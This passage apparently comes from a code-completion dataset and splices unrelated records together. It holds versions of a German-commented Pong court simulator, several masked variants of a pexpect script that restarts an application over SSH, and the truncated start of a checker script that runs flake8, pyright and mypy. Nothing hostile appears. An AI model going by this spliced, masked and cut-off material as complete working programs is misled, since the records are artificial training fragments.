1)\n\n :return float, Schlägerposition von Spieler[Player]\n \"\"\"\n return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax\n\n def scaled_sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_x())\n\n :return float, skalierter X-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_x() / (self.x_max / 2.0) - 1.0\n\n def scaled_sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_y())\n\n :return float, skalierter Y-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_y() / (self.y_max / 2.0) - 1.0\n\n def scaled_sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1\n mit Rauschen zurück\n (Rauschen kommt von __sensor_bat())\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierte Schlägerposition von Spieler[Player]\n \"\"\"\n return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0\n\n def hitbat(self, player):\n \"\"\"\n Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]\n \"\"\"\n return self._bathit[player]\n\n def scaled_sensor_err(self, player):\n \"\"\"\n Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.\n\n :pre hitbat(player) or out(player)\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierter Error von Spieler[Player]\n \"\"\"\n return (self.poi[player] - self.__sensor_bat(player)) / self.y_max\n\n def out(self, player):\n \"\"\"\n Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)\n \"\"\"\n return self._out[player]\n\n def getpoints(self, player):\n \"\"\"\n Liefert die Punktanzahl von Spieler[Player]\n\n :param player: Punktzahl von Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return int, Punktzahl des Spielers\n \"\"\"\n return self.Points[player]\n\n def tick(self):\n \"\"\"\n Berechnet einen Tick/Spielzug,\n hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien\n oder die Kollision mit einem Schläger auf False initialisiert, außerdem\n die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und\n her gespielt haben ohne Tor (Endlosspiel verhindern).\n Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen\n Bewegungs-/Richtungsvektor ändern muss.\n Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder\n ob ein Schläger den Ball getroffen hat.\n\n :return void\n \"\"\"\n self.posVec += self.dirVec * self.speed\n self._bathit = [False, False]\n self._out = [False, False]\n if self.bouncecount > 10:\n self.__initvectors()\n if self.posVec[1] < 0:\n self.posVec[1] *= -1.0\n self.dirVec[1] *= -1.0\n if self.posVec[1] > self.y_max:\n self.posVec[1] = 2 * self.y_max - self.posVec[1]\n self.dirVec[1] *= -1.0\n self.__tickBounceLeft()\n self.__tickBounceRight()\n\n def __tickBounceLeft(self):\n \"\"\"\n Checken, ob der Ball links bei Spieler 0 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n\n :return: void\n \"\"\"\n if self.posVec[0] < 0:\n factor = (0 - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + factor * self.dirVec\n self.poi[0] = poi[1]\n if poi[1] > self.bat[0] - self.batsize and poi[1] < self.bat[0\n ] + self.batsize:\n self._bathit[0] = True\n else:\n self.Points[1] += 1\n self._out[0] = True\n if self.infinite or self._bathit[0]:\n self.posVec[0] *= -1.0\n self.dirVec[0] *= -1.0\n self.bouncecount += 1\n else:\n self.__initvectors()\n self.bouncecount = 0\n\n def __tickBounceRight(self):\n \"\"\"Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n :return: void\n \"\"\"\n if self.posVec[0] > self.x_max:\n factor = (self.x_max - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + factor * self.dirVec\n self.poi[1] = poi[1]\n if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1\n ] + self.batsize:\n self._bathit[1] = True\n else:\n self.Points[0] += 1\n self._out[1] = True\n if self.infinite or self._bathit[1]:\n self.posVec[0] = 2 * self.x_max - self.posVec[0]\n self.dirVec[0] *= -1.0\n self.bouncecount += 1\n else:\n self.__initvectors()\n self.bouncecount = 0\n\n def move(self, player, action):\n \"\"\"\n Bewegt den Schläger eines Spielers\n Diese Funktion ist etwas Trickreich, da als \"action\"-Parameter sowohl ein String als direkter\n up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.\n\n :param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)\n :type player: Int\n\n :param action: Wenn str, dann zwischen \"d\" oder \"u\" unterscheiden (Schläger hoch oder runter bewegen)\n :type action: String\n\n :param action: Wenn float, dann Schläger auf die entsprechende Position setzen\n :type action: float\n\n :return: void\n \"\"\"\n if type(action) == str:\n if action == 'u':\n self.bat[player] += self.batstep\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n if action == 'd':\n self.bat[player] -= self.batstep\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n elif type(action) == float:\n self.bat[player] = (action + 1) * self.y_max / 2\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n\n def v_getSize(self):\n \"\"\"\n visu-getter\n\n :return float Liste [Float: X, Float: Y] der Spielfeldgröße\n \"\"\"\n return [self.x_max, self.y_max]\n\n def v_getSpeed(self):\n \"\"\"\n visu-getter\n\n :return float Ballgeschwindigkeit\n \"\"\"\n return self.speed\n\n def v_getBatSize(self):\n \"\"\"\n visu-getter\n\n :return float Schlägerlänge (Größe)\n \"\"\"\n return self.batsize\n\n def v_getDirVec(self):\n \"\"\"\n visu-getter\n\n :return float Bewegungsvektor\n \"\"\"\n return self.dirVec\n\n def v_getPosVec(self):\n \"\"\"\n visu-getter\n\n :return float Ortsvektor Liste [Float: X,Float: Y]\n \"\"\"\n return self.posVec\n\n def v_getbat(self):\n \"\"\"\n visu-getter\n\n :return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1\n \"\"\"\n return self.bat\n\n def v_getPoint(self):\n \"\"\"\n visu-getter\n\n :return: Liste [X,Y] des Punktestundes für Spieler 0 / 1\n \"\"\"\n return self.Points\n",
"step-5": "#!/usr/bin/env python3.4\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDas Pong-Spielfeld wird simuliert.\n\nCourt moduliert ein anpassbares Spielfeld für Pong mit einem standardmäßigen Seitenverhältnis von 16:9.\nJenes Spielfeld verfügt über einen Ball und zwei Schläger, jeweils links und rechts am Spielfeldrand,\nsowie einen Punktestand für beide Spieler (0 und 1).\nSpieler 0 spielt auf der linken Hälfte, Spieler 1 auf der rechten Hälfte.\nZwecks einfacher Adaptierung an Folgesysteme ist die Schnittstelle mit normierten Ein- und Ausgabewerten versehen,\nwelches alle Daten auf ein Interval [-1.0, 1.0] normiert.\n\"\"\"\n\n__author__ = \"Daniel Speck, Florian Kock\"\n__copyright__ = \"Copyright 2014, Praktikum Neuronale Netze\"\n__license__ = \"GPLv3\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Daniel Speck, Florian Kock\"\n__email__ = \"2speck@informatik.uni-hamburg.de, 2kock@informatik.uni-hamburg.de\"\n__status__ = \"Development\"\n\nimport numpy as np\nimport random\n\n\nclass court:\n \"\"\"\n Objekt, dass das Spielfeld darstellt.\n\n Enthält außerdem Funktionen zur Manipulation von Schlägern und Inspektoren für die Daten:\n - Skalierte Daten für die KNNs\n - Unskalierte Daten für die Visualisierung\n \"\"\"\n\n\n def __init__(self):\n \"\"\"\n Initialisiert ein court-Objekt.\n Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.\n\n :return void\n \"\"\"\n\n ##############################\n ### veränderbare Parameter ###\n ##############################\n\n # Größe des Spielfeldes (standardmäßig 16 zu 9; hat bei Tests bewährt)\n self.x_max = 16.0\n self.y_max = 9.0\n\n # Ballgeschwindigkeit\n # (Faktor für den Richtungs-/Bewegungsvektor / die Ballgeschwindigkeit;\n # NeuerOrtsvektor = AlterOrtsvektor + Richtungs-/Bewegungsvektor * Ballgeschwindigkeitsfaktor)\n self.speed = 0.5\n\n # Rauschen auf die Ballposition hinzufügen (Faktor)\n self.outputNoiseMax = 0.0 # Achtung: Noch nie mit Rauschen getestet! Sollte bei 0 bleiben!\n\n # Soll der Ball aus dem Spielfeld fliegen können oder ewig hin und her springen?\n # True -> Ball fliegt ewig hin und her, wird bei einem Tor nicht auf Startposition zurückgesetzt\n # False -> Ball wird bei Tor zurückgesetzt auf die Startposition\n self.infinite = False\n\n # Größe der Schläger von Spieler 0 und 1\n # (von der Mitte zum Ende, d.h hier die halbe Länge der gewünschten Gesamtlänge eintragen!)\n self.batsize = 1.0\n\n # Im Befehlsmodus kann der Schläger mit den Befehlen 'u' und 'd' bewegt werden.\n # Hier wird die dazugehörige Sprungweite des Schlägers angegeben.\n self.batstep = 0.3\n\n ############################################\n ### Initialisierungen (nicht verändern!) ###\n ############################################\n\n # Ortsvektor des Balles (Bezugspunkt ist [0,0])\n self.posVec = None\n\n # Richtungs-/Bewegungsvektor des Balles (Einheitsvektor)\n self.dirVec = None\n\n # Binärer Speicher, ob der Ball den einen Schläger getroffen hat [links, rechts]\n self._bathit = [False, False]\n\n # Binärer Speicher, ob der Ball die Linie geflogen ist [links, rechts]\n self._out = [False, False]\n\n # Punktestand [Spieler 0, Spieler 1]\n self.Points = [0, 0]\n\n # Der \"Einschlagspunkt\" des Balles auf der (Toraus-)Linie, wird erst nach einem Aufprall\n # mit konkreten Werten belegt und dann zur Fehlerberechnung genutzt (supervised learning).\n self.poi = [None, None]\n\n # Initiale Schlägerpositionen der Spieler auf ihren Linien.\n # [SchlängerLinks, SchlägerRechts]\n # Positionsänderungen sind somit, wie in Pong üblich, nur auf der Y-Achse möglich.\n self.bat = [self.y_max / 2.0, self.y_max / 2.0]\n\n # Zählt die Schlägertreffer (Kollisionen des Balles mit einem Schläger).\n # Die KNNs sollen unterschiedliche Winkel lernen (der Winkel wird immer zufallsinitialisiert),\n # bei ausreichender Lerndauer bzw. stark minimiertem Fehler jedoch sind die KNNs manchmal auf\n # einigen Winkeln derart talentiert, dass der Ball nie mehr über die Torlinie gehen würde.\n # Um ein solches \"Endlosspiel\" zu verhindern, wird der Ball nach 10 Treffern resettet,\n # das Spielfeld also zurückgesetzt mit einer initialen Ballposition auf der Spielfeldmitte und\n # neuem, zufallskalkuliertem Winkel.\n self.bouncecount = 0\n\n # Startvorbereitung\n # Initialisiert das erste Mal den Ortsvektor und Bewegungs-/Richtungsvektor\n self.__initvectors()\n\n\n def __initvectors(self):\n \"\"\"\n Initialisiert Anfangs- und Richtungsballvektoren.\n Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.\n Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.\n\n :return void\n \"\"\"\n\n # Richtungsvektor erzeugen\n\n # Zufallswinkel im Bogenmaß generieren\n # 2 Pi entsprechen dem vollen Einheitskreis, also 360°\n # [-Pi/4, +Pi/4] entspricht einem Interval von [-45°, +45°]\n # Dieses Interval hat sich bewährt, da zu spitze den Lerneffekt und vor allem die Lerndauer\n # negativ beeinflussen.\n rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)\n\n # Aus dem Zufallswinkel eine entsprechende Rotationsmatrix generieren\n rotMatrix = np.array([\n [np.cos(rotationAngle), -np.sin(rotationAngle)],\n [np.sin(rotationAngle), np.cos(rotationAngle)]\n ])\n\n # Rotationsmatrix auf einen Einheitsvektor (horizontale Ausrichtung) anwenden\n self.dirVec = np.dot(rotMatrix, np.array([1, 0]))\n\n # Zufällig entscheiden, ob der Ball nach links (zu Player 0) oder rechts (zu Player 1) startet.\n if random.random() > 0.5:\n self.dirVec[0] *= -1.0 # x-Komponente des Richtungs-/Bewegungsvektors wird an der Y-Achse gespiegelt\n\n # Ortsvektor erzeugen\n\n # Start irgendowo auf der Mittellinie\n # (x-Koordinate ist also fixiert auf die Mittellinie, y-Koordinate zufällig)\n self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()])\n\n # Rücksetzen der Anzahl der Schlägertreffer (__init__)\n self.bouncecount = 0\n\n\n def _incrpoints(self, player):\n \"\"\"\n Erhöht den Punktestand für einen Spieler[Player]\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return void\n \"\"\"\n self.Points[player] += 1\n\n\n def __sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, X-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax\n\n\n def __sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, Y-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[1] + (random.random() - 0.5) * self.outputNoiseMax\n\n\n def __sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers auf der Y-Achse von Spieler[Player] mit Rauschen zurück\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, Schlägerposition von Spieler[Player]\n \"\"\"\n return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax\n\n\n def scaled_sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_x())\n\n :return float, skalierter X-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_x() / (self.x_max / 2.0) - 1.0\n\n\n def scaled_sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_y())\n\n :return float, skalierter Y-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_y() / (self.y_max / 2.0) - 1.0\n\n\n def scaled_sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1\n mit Rauschen zurück\n (Rauschen kommt von __sensor_bat())\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierte Schlägerposition von Spieler[Player]\n \"\"\"\n return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0\n\n\n def hitbat(self, player):\n \"\"\"\n Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]\n \"\"\"\n return self._bathit[player]\n\n\n def scaled_sensor_err(self, player):\n \"\"\"\n Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.\n\n :pre hitbat(player) or out(player)\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierter Error von Spieler[Player]\n \"\"\"\n return (self.poi[player] - self.__sensor_bat(player) ) / self.y_max\n\n\n def out(self, player):\n \"\"\"\n Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)\n \"\"\"\n return self._out[player]\n\n\n def getpoints(self, player):\n \"\"\"\n Liefert die Punktanzahl von Spieler[Player]\n\n :param player: Punktzahl von Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return int, Punktzahl des Spielers\n \"\"\"\n return self.Points[player]\n\n\n def tick(self):\n \"\"\"\n Berechnet einen Tick/Spielzug,\n hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien\n oder die Kollision mit einem Schläger auf False initialisiert, außerdem\n die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und\n her gespielt haben ohne Tor (Endlosspiel verhindern).\n Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen\n Bewegungs-/Richtungsvektor ändern muss.\n Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder\n ob ein Schläger den Ball getroffen hat.\n\n :return void\n \"\"\"\n\n #########################\n ### Initialisierungen ###\n #########################\n\n # Setzt den Ball eine Position weiter.\n # Die Schrittweite wird durch den Faktor self.speed gesetzt, der den Einheitsvektor dirVec skaliert\n self.posVec += self.dirVec * self.speed\n\n # Hat der Schläger den Ball getroffen?\n # bathit[0] -> linker Schläger\n # bathit[1] -> rechter Schläger\n self._bathit = [False, False]\n self._out = [False, False]\n\n ###################\n ### Anweisungen ###\n ###################\n\n # Falls 10 oder mehr Treffer also jeder mindestens 5x getroffen hat, dann wird abgebrochen\n # und neu gestartet, damit die aktuelle Endlosschleife unterbrochen wird. Hier würde das KNN\n # sonst nichts Neues mehr lernen.\n if self.bouncecount > 10:\n self.__initvectors()\n\n # Abprallen an der Unterseite bei Y = 0\n if self.posVec[1] < 0:\n self.posVec[1] *= -1.0\n self.dirVec[1] *= -1.0\n \n # Abprallen an der Oberseite bei Y = y_max (hier vermutlich 9)\n if self.posVec[1] > self.y_max:\n self.posVec[1] = 2 * self.y_max - self.posVec[1]\n self.dirVec[1] *= -1.0\n \n # Prüfe auf Treffer auf der linken Seite (Spieler 0)\n self.__tickBounceLeft()\n \n # Prüfe auf Treffer auf der rechten Seite (Spieler 1)\n self.__tickBounceRight()\n\n\n def __tickBounceLeft(self):\n \"\"\"\n Checken, ob der Ball links bei Spieler 0 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n\n :return: void\n \"\"\"\n\n # Wenn der Ortsvektor kleiner ist als 0, dann hat er die Torauslinie von Spieler 0 überschritten\n if self.posVec[0] < 0:\n\n # Berechne den theoretischen, genauen Aufprallpunkt (poi: PointOfImpact)\n # auf der Linie von Spieler 0 (Y = 0)\n\n factor = (0 - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + (factor * self.dirVec)\n\n self.poi[0] = poi[1] # Speichere diesen für eine evtl. spätere Nutzung von z.B. scaled_sensor_err(player)\n\n # Prüfe ob der Ball dann den Schläger getroffen hätte, wenn ja, dann...\n if (poi[1] > self.bat[0] - self.batsize) and (poi[1] < self.bat[0] + self.batsize):\n self._bathit[0] = True # ... vermerke dies für z.B. hitbat(player)\n else: # wenn jedoch nicht, dann...\n self.Points[1] += 1 # ... Punkte von Spieler 1 (rechts) erhöhen\n self._out[0] = True # und merken, das der Ball außerhalb des Spielfelds\n # war, z.B. für out(player)\n\n # Ball abprallen lassen, falls:\n # -> Infinite true ist, also das Spiel endlos dauern soll ohne Zurücksetzen der Ballposition\n # -> Der Schläger den Ball getroffen hat\n if self.infinite or self._bathit[0]:\n self.posVec[0] *= -1.0 # Einfallswinklel = Ausfallswinkel\n self.dirVec[0] *= -1.0\n\n self.bouncecount += 1 # Treffer vermerken, um bei zu vielen Treffern dieses neu zu starten\n else:\n self.__initvectors() # Kein Treffer, somit das Spiel neu Initialisieren.\n self.bouncecount = 0\n\n\n def __tickBounceRight(self):\n \"\"\"Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n :return: void\n \"\"\"\n # Wenn der Ortsvektor größer ist als x_max (hier vermutlich 16), dann hat er die Torauslinie\n # von Spieler 1 überschritten\n if self.posVec[0] > self.x_max:\n\n # Berechne den theoretischen, genauen Aufprallpunkt (poi: PointOfImpact) auf der Linie von\n # Spieler (Y = self.x_max)\n factor = (self.x_max - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + (factor * self.dirVec)\n\n self.poi[1] = poi[1] # Speichere diesen für eine evtl. spätere Nutzung von z.B. scaled_sensor_err(player)\n\n # Prüfe ob der Ball dann den Schläger getroffen hätte, wenn ja, dann...\n if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1] + self.batsize:\n self._bathit[1] = True # ... vermerke dies für z.B. hitbat(player)\n else: # wenn jedoch nicht, dann...\n self.Points[0] += 1 # ... Punkte von Spieler 0 (links) erhöhen\n self._out[1] = True # und merken, das der Ball außerhalb des Spielfelds\n # war, z.B. für out(player)\n\n # Ball abprallen lassen, falls:\n # -> Das infinite true ist, also das Spiel endlos dauern soll ohne Zurücksetzen der Ballposition\n # -> Der Schläger den Ball getroffen hat\n if self.infinite or self._bathit[1]:\n # 2 Spielfeldlängen - aktuellem X-Betrag ergibt neue X-Position\n self.posVec[0] = 2 * self.x_max - self.posVec[0] # Einfallswinklel = Ausfallswinkel\n self.dirVec[0] *= -1.0\n\n self.bouncecount += 1 # Treffer vermerken, um bei zu vielen Treffern dieses neu zu starten\n else:\n self.__initvectors() # Kein Treffer, somit das Spiel neu Initialisieren.\n self.bouncecount = 0\n\n\n def move(self, player, action):\n \"\"\"\n Bewegt den Schläger eines Spielers\n Diese Funktion ist etwas Trickreich, da als \"action\"-Parameter sowohl ein String als direkter\n up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.\n\n :param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)\n :type player: Int\n\n :param action: Wenn str, dann zwischen \"d\" oder \"u\" unterscheiden (Schläger hoch oder runter bewegen)\n :type action: String\n\n :param action: Wenn float, dann Schläger auf die entsprechende Position setzen\n :type action: float\n\n :return: void\n \"\"\"\n\n # Wenn ein String, dann im Befehls-Modus:\n if type(action) == str:\n\n # Den Schläger nach oben bewegen\n if action == 'u':\n self.bat[player] += self.batstep\n if self.bat[player] > self.y_max: # Korrektur, falls der obere Spielfeldrand erreicht wurde\n self.bat[player] = self.y_max\n\n # Den Schläger nach unten bewegen\n if action == 'd':\n self.bat[player] -= self.batstep\n if self.bat[player] < 0.0: # Korrektur, falls der untere Spielfeldrand erreicht wurde\n self.bat[player] = 0.0\n\n # Sonst im Setzen-Modus:\n elif type(action) == float:\n self.bat[player] = (action + 1) * self.y_max / 2 # Der Schläger wird direkt auf die gewünschte Position gesetzt\n if self.bat[player] < 0.0: # Korrektur, falls der untere Spielfeldrand erreicht wurde\n self.bat[player] = 0.0\n if self.bat[player] > self.y_max: # Korrektur, falls der obere Spielfeldrand erreicht wurde\n self.bat[player] = self.y_max\n\n\n def v_getSize(self):\n \"\"\"\n visu-getter\n\n :return float Liste [Float: X, Float: Y] der Spielfeldgröße\n \"\"\"\n return [self.x_max, self.y_max]\n\n\n def v_getSpeed(self):\n \"\"\"\n visu-getter\n\n :return float Ballgeschwindigkeit\n \"\"\"\n return self.speed\n\n\n def v_getBatSize(self):\n \"\"\"\n visu-getter\n\n :return float Schlägerlänge (Größe)\n \"\"\"\n return self.batsize\n\n\n def v_getDirVec(self):\n \"\"\"\n visu-getter\n\n :return float Bewegungsvektor\n \"\"\"\n return self.dirVec\n\n\n def v_getPosVec(self):\n \"\"\"\n visu-getter\n\n :return float Ortsvektor Liste [Float: X,Float: Y]\n \"\"\"\n return self.posVec\n\n\n def v_getbat(self):\n \"\"\"\n visu-getter\n\n :return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1\n \"\"\"\n return self.bat\n\n\n def v_getPoint(self):\n \"\"\"\n visu-getter\n\n :return: Liste [X,Y] des Punktestundes für Spieler 0 / 1\n \"\"\"\n return self.Points",
"step-ids": [
20,
21,
23,
26,
29
]
}
|
[
20,
21,
23,
26,
29
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s.login(ip, username, password)
print('SSH session login successful')
s.sendline('application stop')
s.prompt()
print('Stopping the app')
print("""
Starting the app""")
s.sendline('application start')
s.prompt()
print('\nLogout')
s.logout()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s = pxssh.pxssh()
ip = ''
username = ''
password = ''
s.login(ip, username, password)
print('SSH session login successful')
s.sendline('application stop')
s.prompt()
print('Stopping the app')
print("""
Starting the app""")
s.sendline('application start')
s.prompt()
print('\nLogout')
s.logout()
<|reserved_special_token_1|>
from pexpect import pxssh
import time
s = pxssh.pxssh()
ip = ''
username = ''
password = ''
s.login(ip, username, password)
print('SSH session login successful')
s.sendline('application stop')
s.prompt()
print('Stopping the app')
print("""
Starting the app""")
s.sendline('application start')
s.prompt()
print('\nLogout')
s.logout()
<|reserved_special_token_1|>
#!/usr/bin/env python3
from pexpect import pxssh
import time
s = pxssh.pxssh()
ip = "" #replace ip address
username= "" #replace username
password= "" #replace password
s.login (ip, username, password)
print ("SSH session login successful")
s.sendline ('application stop')
s.prompt() # match the prompt
print("Stopping the app")
print("\nStarting the app")
s.sendline ('application start')
s.prompt()
print ("\nLogout")
s.logout()
|
flexible
|
{
"blob_id": "dd9574ea08beb9bc5f1413afd63c751fd42cba67",
"index": 6406,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ns.login(ip, username, password)\nprint('SSH session login successful')\ns.sendline('application stop')\ns.prompt()\nprint('Stopping the app')\nprint(\"\"\"\nStarting the app\"\"\")\ns.sendline('application start')\ns.prompt()\nprint('\\nLogout')\ns.logout()\n",
"step-3": "<mask token>\ns = pxssh.pxssh()\nip = ''\nusername = ''\npassword = ''\ns.login(ip, username, password)\nprint('SSH session login successful')\ns.sendline('application stop')\ns.prompt()\nprint('Stopping the app')\nprint(\"\"\"\nStarting the app\"\"\")\ns.sendline('application start')\ns.prompt()\nprint('\\nLogout')\ns.logout()\n",
"step-4": "from pexpect import pxssh\nimport time\ns = pxssh.pxssh()\nip = ''\nusername = ''\npassword = ''\ns.login(ip, username, password)\nprint('SSH session login successful')\ns.sendline('application stop')\ns.prompt()\nprint('Stopping the app')\nprint(\"\"\"\nStarting the app\"\"\")\ns.sendline('application start')\ns.prompt()\nprint('\\nLogout')\ns.logout()\n",
"step-5": "#!/usr/bin/env python3\n\nfrom pexpect import pxssh\nimport time\ns = pxssh.pxssh()\nip = \"\" #replace ip address\nusername= \"\" #replace username\npassword= \"\" #replace password\ns.login (ip, username, password)\nprint (\"SSH session login successful\")\ns.sendline ('application stop')\ns.prompt() # match the prompt\nprint(\"Stopping the app\")\n\nprint(\"\\nStarting the app\") \ns.sendline ('application start')\ns.prompt() \nprint (\"\\nLogout\")\ns.logout()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
"""
Checker of generated packages.
- [x] import generated package
- [x] flake8
- [x] pyright
- [x] mypy
"""
import argparse
import json
import logging
import subprocess
import sys
import tempfile
from dataclasses import dataclass
from pathlib import Path
from typing import List, Optional
ROOT_PATH = Path(__file__).parent.parent.resolve()
LOGGER_NAME = "check_output"
IGNORE_PYRIGHT_ERRORS = (
'"get_paginator" is marked as overload, but no implementation is provided',
'"get_waiter" is marked as overload, but no implementation is provided',
# 'Expected type arguments for generic class "ResourceCollection"',
# 'Type "None" cannot be assigned to type',
# '"__next__" is not present',
# 'Import "boto3.s3.transfer" could not be resolved',
# "is partially unknown",
'Method "paginate" overrides class "Paginator" in an incompatible manner',
'Method "wait" overrides class "Waiter" in an incompatible manner',
'define variable "items" in incompatible way',
'define variable "values" in incompatible way',
"must return value",
'Import "types_aiobotocore_',
'Import "mypy_boto3_',
)
IGNORE_MYPY_ERRORS = (
'Signature of "create_client" incompatible with supertype "Session"',
'Signature of "paginate" incompatible with supertype "Paginator"',
'Signature of "wait" incompatible with supertype "Waiter"',
"note:",
)
class SnapshotMismatchError(Exception):
"""
Main snapshot mismatch exception.
"""
def setup_logging(level: int) -> logging.Logger:
"""
Get Logger instance.
Arguments:
level -- Log level
Returns:
Overriden Logger.
"""
logger = logging.getLogger(LOGGER_NAME)
stream_handler = logging.StreamHandler()
formatter = logging.Formatter("%(levelname)s %(message)s", datefmt="%H:%M:%S")
stream_handler.setFormatter(formatter)
stream_handler.setLevel(level)
logger.addHandler(stream_handler)
logger.setLevel(level)
return logger
@dataclass
class CLINamespace:
"""
CLI namespace.
"""
debug: bool
path: Path
filter: List[str]
exit_on_error: bool
def parse_args() -> CLINamespace:
"""
Parse CLI arguments.
"""
parser = argparse.ArgumentParser(__file__)
parser.add_argument("-d", "--debug", action="store_true")
parser.add_argument("-x", "--exit-on-error", action="store_true")
parser.add_argument("-p", "--path", type=Path, default=ROOT_PATH / "mypy_boto3_output")
parser.add_argument("filter", nargs="*")
args = parser.parse_args()
return CLINamespace(
debug=args.debug,
path=args.path,
filter=args.filter,
exit_on_error=args.exit_on_error,
)
def run_flake8(path: Path) -> None:
"""
Check output with flake8.
"""
with tempfile.NamedTemporaryFile("w+b") as f:
try:
subprocess.check_call(
[
sys.executable,
"-m",
"flake8",
"--ignore",
"E203,W503,E501,D200,D107,D401,D105,D205,D400,D101,D102,D403,N802,N803",
path.as_posix(),
],
stderr=f,
stdout=f,
)
except subprocess.CalledProcessError:
temp_path = Path(f.name)
output = temp_path.read_text()
raise SnapshotMismatchError(output)
def run_pyright(path: Path) -> None:
"""
Check output with pyright.
"""
with tempfile.NamedTemporaryFile("w+b") as f:
try:
subprocess.check_call(
["npx", "pyright", path.as_posix(), "--outputjson"],
stderr=subprocess.DEVNULL,
stdout=f,
)
return
except subprocess.CalledProcessError:
pass
temp_path = Path(f.name)
output = temp_path.read_text()
